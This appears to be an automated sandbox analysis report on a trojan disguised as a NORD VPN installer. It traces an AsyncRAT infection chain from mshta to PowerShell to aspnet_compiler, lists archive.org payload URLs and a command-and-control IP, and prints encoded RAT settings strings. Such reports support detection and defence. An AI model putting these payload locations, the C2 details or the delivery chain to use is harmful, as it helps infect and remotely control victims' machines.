"hb4rbDi2yorRia4zVii6fBe5zR5qZuT/oNzKkm5RCPxVI+DpAg6tP0HKmjqKbYbfXixb6DODIWmirNXfb6RavFFZFj5L1BSmGSCWmeVDM/IkG1v7H8053Uky0QHQ2bPzEIhio/2bZG7nxydLDiWz7jOA5hTZddxPN8Br/tFDBgOA2YvoFolDN/SyqFz61tucLLLKImugUQPB4sHE/xkAyXi1gtGQ/16xTSWjEKwIRYr/7rvSmfWpY/5oDiJvkWS/1MZAIQNLY1fyi9FRErVVeUnnTikLjZhOkouk7/QdJsJez78RuLjg+I5tTMBYhxG6q81sg7SrqotPY0sK3ZZAKaU4Vrmy1LKrBMpNQv3JiIWlI/lS56GB2bN/TA9sLcKAATEeWREuz8l/bJURfyZFk91OWqZ1mHwEXQGj5Wttm8jf+gG2TbMHgCPcpwFUFMqB7fSQIKv+pU1KOAvU64CUeLTzks4X5N8aHvduxLez78VMAyXSa2PWbv9znaxZZWCGScStHepOMiR4AXViv5F4HTb8v2nZ2x60Q0rMNmZ3T1yMA+WbdCeNBQDFD8roIU7iXGsheZ3Cfnd9MOYde+KESXBKyoZGdGoocdgu9NTzxVBAZ9fOUEXjXRfS6fh+dnAJc0GNGimVg/1EX6Q+xeKnpb2b73IU7G28wz78gQndt1Y=", "Group": "Default"}
          Source: 23.2.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
          Source: unknownHTTPS traffic detected: 207.241.227.119:443 -> 192.168.2.3:49719 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.227.126:443 -> 192.168.2.3:49727 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.3:49728 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.232.198:443 -> 192.168.2.3:49729 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.227.112:443 -> 192.168.2.3:49715 version: TLS 1.2
          Source: xGrfj8RvYg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\Users\Win 10 test Antiviru\Desktop\NORD VPN\NORD VPN\obj\Debug\NORD VPN.pdb source: xGrfj8RvYg.exe

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 216.230.75.62:1107 -> 192.168.2.3:49747
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 216.230.75.62:1107
          Source: Joe Sandbox ViewIP Address: 207.241.227.126 207.241.227.126
          Source: Joe Sandbox ViewIP Address: 207.241.227.112 207.241.227.112
          Source: Joe Sandbox ViewIP Address: 207.241.224.2 207.241.224.2
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownHTTPS traffic detected: 207.241.227.119:443 -> 192.168.2.3:49719 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.227.126:443 -> 192.168.2.3:49727 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.3:49728 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.232.198:443 -> 192.168.2.3:49729 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownDNS traffic detected: queries for: ia601502.us.archive.org
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: http://archive.org
          Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
          Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
          Source: powershell.exe, 00000003.00000003.207486771.0000027D9F6B6000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
          Source: mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
          Source: mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmpString found in binary or memory: http://crl.goi
          Source: powershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft
          Source: aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: powershell.exe, 00000003.00000002.478183437.0000027D87F0E000.00000004.00000001.sdmpString found in binary or memory: http://ia601406.us.archive.org
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: http://ia803408.us.archive.org
          Source: powershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmpString found in binary or memory: http://microsoft.co
          Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
          Source: mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
          Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.472135094.0000027D871C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://archive.org
          Source: powershell.exe, 00000003.00000002.477635897.0000027D87D15000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478302181.0000027D87F6C000.00000004.00000001.sdmpString found in binary or memory: https://archive.org/download/run-02-02-02/Run_02_02_02.TXT
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://archive.orgx
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
          Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000003.00000002.480627087.0000027D88C97000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.org
          Source: powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.477673861.0000027D87D1D000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.org/32/items/run-02-02-02/Run_02_02_02.TXT
          Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.org/9/items/server-lol-123_20210603/
          Source: powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.org/9/items/server-lol-123_20210603/Server_lol123.txt
          Source: powershell.exe, 00000003.00000002.477673861.0000027D87D1D000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.org/9/items/server-lol-123_20210603/Server_lol123.txt0ywI
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.org8
          Source: powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.orgx
          Source: mshta.exe, 00000002.00000002.216563943.0000020091AC3000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/
          Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmp, xGrfj8RvYg.exeString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
          Source: mshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...
          Source: mshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...7l
          Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt0
          Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt1
          Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtC:
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtQ
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtf
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txto
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtr
          Source: mshta.exe, 00000002.00000002.216764785.0000020091CE0000.00000004.00000040.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txts
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtst-MC:
          Source: xGrfj8RvYg.exe, 00000000.00000002.199598225.0000000002B51000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtx
          Source: powershell.exe, 00000003.00000002.477168577.0000027D87BD2000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org
          Source: powershell.exe, 00000003.00000003.210047788.0000027D9F8AB000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/
          Source: powershell.exe, 00000003.00000003.207800027.0000027D9F706000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/21/items
          Source: mshta.exe, mshta.exe, 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/21/items/all-lol-123_20210603/AL
          Source: PowerShell_transcript.715575.7kfD7GZs.20210611063402.txt.3.dr, Clean_lol123[1].txt.2.drString found in binary or memory: https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia803408.us.archive.org
          Source: powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia803408.us.archive.org/9/items/run-02-02-02/Run_02_02_02.TXT
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia803408.us.archive.orgx
          Source: mshta.exe, 00000002.00000002.216563943.0000020091AC3000.00000004.00000020.sdmpString found in binary or memory: https://login.live.comq
          Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownHTTPS traffic detected: 207.241.227.112:443 -> 192.168.2.3:49715 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected AsyncRATShow sources
          Source: Yara matchFile source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara matchFile source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          System Summary:

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEDAE0E573_2_00007FFAEDAE0E57
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEDBB25E93_2_00007FFAEDBB25E9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEDBB15ED3_2_00007FFAEDBB15ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02ACD5F023_2_02ACD5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02AC953023_2_02AC9530
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02AC8C6023_2_02AC8C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02ACF29823_2_02ACF298
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02AC891823_2_02AC8918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141D5AC25_2_0141D5AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141F5F225_2_0141F5F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141D5A025_2_0141D5A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141B8FC25_2_0141B8FC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141DB6925_2_0141DB69
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141DB7825_2_0141DB78
          Source: xGrfj8RvYg.exe, 00000000.00000002.199383295.0000000000F10000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000000.196616953.00000000008C4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNORD VPN.exe2 vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000002.199294357.0000000000E2A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000002.199463500.0000000000F70000.00000002.00000001.sdmpBinary or memory string: originalfilename vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000002.199463500.0000000000F70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exeBinary or memory string: OriginalFilenameNORD VPN.exe2 vs xGrfj8RvYg.exe
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscorjit.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscorjit.dllJump to behavior
          Source: 00000002.00000003.214415545.00000208942AB000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
          Source: 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
          Source: 00000002.00000002.218422171.00000208942AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txt, type: DROPPEDMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Settings.csBase64 encoded string: 'qkd/uccjEGFopaL8x4X62OjpEkF53RIrVmdHiIQT3o/oSel/ZFoI3BdUmWGHw1QXea71IOmDn7FuU2mCoQMVHQ==', 'hu2k5qJU3Ty2oDTj9+W03QlquYg2dD10GaZparwCdAkmRlNWAS0v22EB8YrQ8Uuf+ogLizH6sAwXxQtwm9V5kA==', 'wy4FrP4MdYwUsBdubsMHqG0pMV9m5aM0RcJPBOQ8V+WYaTUxO7/RDg/oMYihzU8B0zRGLT8+JKyZmLN/kqlPaNUCbTxNVXQ7sqbJxHzBc9KHJV7oNns8MT4cJlKflapFw/TrckF6nvFG/p2tHsQNca+4W/vjj4k8cSdqYte0+6rvz8uEbLL1HIQeRZSTHlyF/4SJ8+KBPFSpILfv3IhfD0nxCfizJEG2FtWVRA5DIrgKIaqEhK1hdZML3IhvoV1E3uQbA7PF+3oTrFPm0AE/wChls03lURmsP9KQ7M8HpjHvBYX5Azu00QjhA2tYjuD9Fsa14hYb52X3jyqGVfId6j7sIqvnnf/LBt4yOHSpTvCJZ+ehWE0ZUNiaEV5X+iDVj+cuDSN80Y9hnSz8zCtQ6o+9vuLQRlZ9pch3A7lCYkY8Bc/DxoqVadcXetB/5Qy41Gjrf9rYV7hThUxQBRPJOk0tKTOz1GgMCu5G5V31MuChb2uw8Cu8B3DfPvE/AVjD0xEmZzvKACpiwjr/E/+ntp/NQ20ioAFBjvzEU9foCG8SxqE/RzosEwSuaLBkksUXWgCfCMlK3qCSbDQcgT+lPDJbsflCYyBjl+TJgJBf6bHnluI1jhS3BWfngUG5BPWcn2AVz/2l/mWU9OrmzzAlYlfBAKWYEiEwjgC3hdMC7JsyOo16bA5kjV4jvsGuBYsgTvS2LxPm5lYSlXmC2dBU5Yi5LaMHTbtqCkxENH0+vVTIFL7RfTDd8O5e5r1uwWXJcVmhMJUWXaiG7u2IXzS3V4E0+5zNwjXKqtcKn145nBULie0tWLoUTgGsWaZv0u66nsda/rk40fM4yRt7QG49X9g1aIFOBtxf78z/6JuaayPjMvuq6tSSv13ass1wu7CMxaHjemCbDCDEtbp7GwYnkheyoajdcD9l3YOg7vAd3QPtko1K6dseMd7PqAlOWIAvnV8N0IZlCW7EpZn3o98Xzd0hWpuGucVKmVVYUyoDV4iOUue+gQz17KBZoBmt2xEkGwKEE+IP85RF8yaNjXbUqTMLH/2IDQFYKhcdgpIrXX5+lyvZ7Ua3l6kCDf7mEpkqOhCNBYe/ZKZKlVfIkGTg3LuBSF/ImeK6zMPN8wP4VLhYYpZ1c39K/oHowYlW2ez+lBdmbzZrwHCoHC7fT3Sy/RqEbkkBBs00iWTYNgosbaO/vzfYCc12fEe3Div6gIb7Q5GNIXF5UqCCTA5SYuMhf8QKefw/s/9MSFVWh9PXrF2xH2YnKABZd1JG+D/IaZWZo/g+dXJc73puHtWAsnyTs5Oofgawj1WX/VGm7fJhyorEZRMhfyWgt9qWYWS2OzULAxz3gB9BSW20wQvaKwuKYMr8pi+8RitqB/12mhEZUvvWwy9Ql62lM3Y8ymgUxxvnPQzVNytxPe74jM93+uxeHuVXUTggUcMJlU3RurH9OXthTcIeKYiPKBePQTdRf4ua4ISHiDn6flBqvlrH48t2+ETHA8tJk68lbnWjmX8IPgAjOnLbXZL5/DjbiillYb36uEARi3opye/Vb4RAPiClTbKUQ3zvW6g7TYGvagfGw7sXJCqyksS3/iJcfXY4Sg96Vy1NccnUbdsKAweoyDfRfX3aq5hKWbis66SgCGPVp7pM6DX4hj3jQxd1Mc9VSsQVS4AeXXpD6AjbkwRhmEiAzI/ZoR5B1KnM2YsAaedoc+BbatYmWhw2pkjNaKoNpLPYHTWxj8OtEZkf4F9DXrs0Sxr62UwrnJAlowdIpIfFmnw7VFVBzvqvhPD13A8oNSjdoMn3f/fsR5R5yyxDH3UgXa4S7a3W3nLWMIp7MpXZMJbX53PR1rvJ7dI44V4QrP9od6wS8FFex3gn1K6v6o4+pn0Ehzd+HkdXtJNk3jVyzJ8Goy4p7pE72I3aFg6+WGRpOHrEnzfnNsvuKvpSfi8KVbh3edyae9VvAdbMluxNMNFIoKkOojDJ6/s5bH6ioy0i6CSCcnEXbz1EOpPkSDTJMLx5vuPM0TB75jA5CUqmB9RSGZYGXyG1dWUUnY759PsEe5rukNldvLgryVT1dQThr3iyMnKmsDwvRTouLGiRkpFASNFSbQYpc5khpYNTxnKEgLxNhjGaAh2NsaSOiy8mpEbzYajuHNsrbL/wz47wbOwlGqrbSBKkUokY8UsYRD5a//+DnMrCmcNjJ8avn5+90ipEMZd7vxdnElb1sEcdmGSowmb3NuHiOtKtt2yYYUasFq/KB5F74G1XzJZ7HqFbsBdEn+XyoYR48hz1CHNy2/0DaB/GLdcnabpXIMAu9Lw0VXnbu5yLExc3WJUvKM8fU4YkFWta8KK6GNRrbG24Zsc=', 'ieUFpXePoV+SLhE1mkNi838rLb1MrmgcD6jT/ToFxM4NwMgrxtupl3TG+gmecuvcCEnfuvzcUaxvKVL2Bjh9Ig==', 'PDhFyyKTiKYYUzBZG+73bNiREvjUdtm9jrHBghKK3CI434oJNToMdDpHb8z2JmoINzTXxC+KtllMwRsjolrdRg=='
